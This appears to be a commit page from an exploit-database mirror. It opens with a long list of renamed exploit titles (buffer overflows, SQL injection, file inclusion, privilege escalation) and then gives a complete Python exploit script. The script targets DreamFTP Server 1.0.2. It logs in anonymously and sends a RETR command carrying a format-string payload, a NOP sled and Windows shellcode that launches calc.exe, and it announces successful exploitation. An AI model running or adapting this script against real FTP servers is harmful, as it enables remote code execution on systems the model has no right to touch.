c65daa1397
7 new exploits Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow (3) Exim 4.41 - dns_build_reverse Local Exploit Exim 4.41 - 'dns_build_reverse' Local Exploit 3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow Exploit 3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow BolinTech DreamFTP - (USER) Remote Buffer Overflow (PoC) BolinTech DreamFTP - 'USER' Remote Buffer Overflow (PoC) ProSysInfo TFTP server TFTPDWIN 0.4.2 - Remote Buffer Overflow ProSysInfo TFTP server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1) Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow Exploit Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow Winamp 5.551 - MAKI Parsing Integer Overflow Exploit Winamp 5.551 - MAKI Parsing Integer Overflow Icarus 2.0 - '.icp' Local Stack Overflow (PoC) Icarus 2.0 - '.ICP' Local Stack Overflow (PoC) ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (2) Rock Band CMS 0.10 - news.php Multiple SQL Injection Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection (1) Winamp 5.572 - whatsnew.txt Stack Overflow Exploit Winamp 5.572 - whatsnew.txt Stack Overflow Joomla! Component com_wmtpic 1.0 - SQL Injection Joomla! Component 'com_wmtpic' 1.0 - SQL Injection TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service (1) Joomla! Component MediQnA 1.1 - Local File Inclusion Joomla! Component 'com_mediqna' 1.1 - Local File Inclusion Joomla! Component My Car - Multiple Vulnerabilities Joomla! Component BF Quiz - SQL Injection (1) Joomla! Component com_jepoll - (pollid) SQL Injection Joomla! Component com_jejob JE Job 1.0 - 'catid' SQL Injection Joomla! Component 'com_mycar' - Multiple Vulnerabilities Joomla! Component 'com_bfquiztrial' - SQL Injection (1) Joomla! Component 'com_jepoll' - 'pollid' Parameter SQL Injection Joomla! Component 'com_jejob' 1.0 - 'catid' Parameter SQL Injection Joomla! Component BF Quiz - SQL Injection (2) Joomla! Component 'com_bfquiztrial' - SQL Injection (2) Joomla! Component com_quran - SQL Injection Joomla! Component 'com_quran' - SQL Injection Joomla! Component com_g2bridge - Local File Inclusion Joomla! Component 'com_g2bridge' - Local File Inclusion Joomla! Component com_jsjobs - SQL Injection Joomla! Component 'com_jsjobs' - SQL Injection Joomla! Component ChronoConnectivity (com_chronoconnectivity) - Blind SQL Injection Joomla! Component ChronoForms (com_chronocontact) - Blind SQL Injection Joomla! Component 'com_chronoconnectivity' - Blind SQL Injection Joomla! Component 'com_chronocontact' - Blind SQL Injection Joomla! Component com_lead - SQL Injection Joomla! Component 'com_lead' - SQL Injection Joomla! Component com_djartgallery - Multiple Vulnerabilities Joomla! Component 'com_djartgallery' - Multiple Vulnerabilities Joomla! Component com_searchlog - SQL Injection Joomla! Component 'com_searchlog' - SQL Injection Joomla! Component com_annonces - Arbitrary File Upload Joomla! Component 'com_annonces' - Arbitrary File Upload Joomla! Component cinema - SQL Injection Joomla! Component 'com_cinema' - SQL Injection Joomla! Component Jreservation 1.5 - SQL Injection / Cross-Site Scripting Joomla! Component 'Jreservation' 1.5 - SQL Injection / Cross-Site Scripting Joomla! Component com_jstore - SQL Injection Joomla! Component com_jtickets - SQL Injection Joomla! Component com_jcommunity - SQL Injection Joomla! Component com_jmarket - SQL Injection Joomla! Component com_jsubscription - SQL Injection Joomla! Component 'com_jstore' - SQL Injection Joomla! Component 'com_jtickets' - SQL Injection Joomla! Component 'com_jcommunity' - SQL Injection Joomla! Component 'com_jmarket' - SQL Injection Joomla! Component 'com_jsubscription' - SQL Injection Joomla! Component com_jnewsletter - SQL Injection Joomla! Component 'com_jnewsletter' - SQL Injection Joomla! Component com_joomdocs - Cross-Site Scripting Joomla! Component Answers 2.3beta - Multiple Vulnerabilities Joomla! Component ozio Gallery 2 - Multiple Vulnerabilities Joomla! Component listbingo 1.3 - Multiple Vulnerabilities Joomla! Component 'com_joomdocs' - Cross-Site Scripting Joomla! Component 'com_answers' 2.3beta - Multiple Vulnerabilities Joomla! Component 'com_oziogallery' 2 - Multiple Vulnerabilities Joomla! Component 'com_listbingo' 1.3 - Multiple Vulnerabilities Joomla! Component RSComments 1.0.0 - Persistent Cross-Site Scripting Joomla! Component 'RSComments' 1.0.0 - Persistent Cross-Site Scripting Joomla! Component com_eportfolio - Arbitrary File Upload Joomla! Component 'com_eportfolio' - Arbitrary File Upload Joomla! Component Template BizWeb com_community - Persistent Cross-Site Scripting Joomla! Component Hot Property com_jomestate - Remote File Inclusion Joomla! Component 'com_community' - Persistent Cross-Site Scripting Joomla! Component 'com_jomestate' - Remote File Inclusion Joomla! Component JomSocial 1.6.288 - Multiple Cross-Site Scripting Joomla! Component 'JomSocial' 1.6.288 - Multiple Cross-Site Scripting Joomla! Component com_ybggal 1.0 - 'catid' SQL Injection Joomla! Component 'com_ybggal' 1.0 - 'catid' Parameter SQL Injection Joomla! Component Picasa2Gallery - Local File Inclusion Joomla! Component 'com_picasa2gallery' - Local File Inclusion Joomla! Component JE Ajax Event Calendar - SQL Injection Joomla! Component 'jeeventcalendar' - SQL Injection Joomla! Component com_realtyna - Local File Inclusion Joomla! Component 'com_realtyna' - Local File Inclusion Joomla! Component JE Story Submit - SQL Injection Joomla! Component com_sef - Remote File Inclusion Joomla! Component 'jesubmit' - SQL Injection Joomla! Component 'com_sef' - Remote File Inclusion Joomla! Component JE Awd Song - Persistent Cross-Site Scripting Joomla! Component JE Media Player - Local File Inclusion Joomla! Component 'com_awd_song' - Persistent Cross-Site Scripting Joomla! Component 'JE Media Player' - Local File Inclusion Joomla! Component JE Event Calendar - Local File Inclusion Joomla! Component JE Job com_jejob - Local File Inclusion Joomla! Component JE Section Finder - Local File Inclusion Joomla! Component 'jeeventcalendar' - Local File Inclusion Joomla! Component 'com_jejob' - Local File Inclusion Joomla! Component 'jesectionfinder' - Local File Inclusion Joomla! Component gamesbox com_gamesbox 1.0.2 - 'id' SQL Injection Joomla! Component Joomanager - SQL Injection Joomla! Component 'com_gamesbox' 1.0.2 - 'id' SQL Injection Joomla! Component 'Joomanager' - SQL Injection Joomla! Component com_dateconverter 0.1 - SQL Injection Joomla! Component 'com_dateconverter' 0.1 - SQL Injection Joomla! Component Front-End Article Manager System - Arbitrary File Upload Joomla! Component 'Front-End Article Manager System' - Arbitrary File Upload Joomla! Component Seyret Video (com_seyret) - Blind SQL Injection Joomla! Component 'com_seyret' - Blind SQL Injection Joomla! Component Seyret (com_seyret) - Local File Inclusion Joomla! Component 'com_seyret' - Local File Inclusion Joomla! Component eventcal 1.6.4 com_eventcal - Blind SQL Injection Joomla! Component 'com_eventcal' 1.6.4 - Blind SQL Injection Joomla! Component SocialAds com_socialads - Persistent Cross-Site Scripting Joomla! Component 'com_socialads' - Persistent Cross-Site Scripting Joomla! Component Phoca Gallery (com_phocagallery) - SQL Injection Joomla! Component Front-edit Address Book (com_addressbook) - Blind SQL Injection Joomla! Component 'com_phocagallery' - SQL Injection Joomla! Component 'com_addressbook' - Blind SQL Injection Joomla! Component NijnaMonials (com_ninjamonials) - Blind SQL Injection Joomla! Component SEF (com_sef) - Local File Inclusion Joomla! Component 'com_ninjamonials' - Blind SQL Injection Joomla! Component 'com_sef' - Local File Inclusion Joomla! Component JPodium (com_jpodium) - SQL Injection Joomla! Component 'com_jpodium' - SQL Injection Joomla! Component com_autartimonial - SQL Injection Joomla! Component 'com_autartimonial' - SQL Injection TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service (2) Joomla! Plugin tinybrowser 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit) Joomla! Plugin 'tinybrowser' 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit) Microsoft Excel 2010 - Crash PoC (1) Microsoft Excel 2010 - Crash (PoC) (1) Brooky CubeCart 2.0.1 - SQL Injection Brooky CubeCart 2.0.1/2.0.4 - ndex.php language Parameter Cross-Site Scripting Brooky CubeCart 2.0.1/2.0.4 - 'index.php' language Parameter Cross-Site Scripting Joomla! Component com_easygb - 'Itemid' Parameter Cross-Site Scripting Joomla! Component Percha Downloads Attach 1.1 - 'index.php' Controller Parameter Traversal Arbitrary File Access Joomla! Component Percha Gallery 1.6 Beta - 'index.php' Controller Parameter Traversal Arbitrary File Access Joomla! Component 'com_perchadownloadsattach' 1.1 - 'Controller' Parameter Traversal Arbitrary File Access Joomla! Component 'com_perchagallery' 1.6 Beta - 'Controller' Parameter Traversal Arbitrary File Access Joomla! 1.5.x - Multiple Modules 'search' Parameter Cross-Site Scripting Vulnerabilities Joomla! Component com_sar_news - 'id' Parameter SQL Injection Joomla! Component 'com_sar_news' - 'id' Parameter SQL Injection Joomla! Component Jreservation - Cross-Site Scripting Joomla! Component com_videowhisper_2wvc - Cross-Site Scripting Joomla! Component Gallery XML 1.1 - SQL Injection / Local File Inclusion Joomla! Component 'com_galleryxml' 1.1 - SQL Injection / Local File Inclusion Joomla! Component Miniwork Studio Canteen 1.0 - SQL Injection / Local File Inclusion Joomla! Component 'com_canteen' 1.0 - Local File Inclusion Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection (2) IBM AIX 6.1/7.1/7.2.0.2 - 'lsmcode' Privilege Escalation VLC Media Player 2.2.1 - Buffer Overflow VideoLAN VLC Media Player 2.2.1 - Buffer Overflow Just Dial Clone Script - SQL Injection Just Dial Clone Script - SQL Injection (1) Just Dial Clone Script - SQL Injection Just Dial Clone Script - SQL Injection (2) IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation Freefloat FTP Server 1.0 - 'SITE ZONE' Command Buffer Overflow PCMan FTP Server 2.0.7 - 'NLST' Command Buffer Overflow PCMan FTP Server 2.0.7 - 'SITE CHMOD' Command Buffer Overflow PCMan FTP Server 2.0.7 - 'PORT' Command Buffer Overflow BolinTech DreamFTP 1.02 - 'RETR' Command Remote Buffer Overflow
58 lines
1.9 KiB
Python
Executable file
58 lines
1.9 KiB
Python
Executable file
import socket
|
|
import os
|
|
import sys
|
|
|
|
print '''
|
|
|
|
##############################################
|
|
# Created: ScrR1pTK1dd13 #
|
|
# Name: Greg Priest #
|
|
# Mail: ScrR1pTK1dd13.slammer@gmail.com #
|
|
##############################################
|
|
|
|
# Exploit Title: DreamFTPServer1.0.2_RETR_command_format_string_remotecodevuln
|
|
# Date: 2016.11.04
|
|
# Exploit Author: Greg Priest
|
|
# Version: DreamFTPServer1.0.2
|
|
# Tested on: Windows7 x64 HUN/ENG Professional
|
|
'''
|
|
|
|
ip = raw_input("Target ip: ")
|
|
port = 21
|
|
overflow = '%8x%8x%8x%8x%8x%8x%8x%8x%341901071x%n%8x%8x%24954x%n%x%x%x%n'
|
|
nop = '\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
|
|
#overflow = '%8x%8x%8x%8x%8x%8x%8x%8x%341901090x%n%8x%8x%24954x%n%x%x%x%n\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
|
|
|
|
#shellcode calc.exe
|
|
shellcode =(
|
|
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" +
|
|
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
|
|
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
|
|
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
|
|
"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
|
|
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
|
|
"\x45\x81\x3e\x43\x72\x65\x61\x75" +
|
|
"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
|
|
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
|
|
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
|
|
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
|
|
"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
|
|
"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
|
|
"\x53\x53\x53\x53\x52\x53\xff\xd7")
|
|
|
|
remotecode = overflow + nop + shellcode + '\r\n'
|
|
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
|
|
connect=s.connect((ip ,port))
|
|
s.recv(1024)
|
|
s.send('USER anonymous\r\n')
|
|
s.recv(1024)
|
|
s.send('PASSW hacker@hacker.net\r\n')
|
|
s.recv(1024)
|
|
print remotecode
|
|
print '''
|
|
Successfull Exploitation!
|
|
'''
|
|
message = 'RETR ' + remotecode
|
|
s.send(message)
|
|
s.recv(1024)
|
|
s.close
|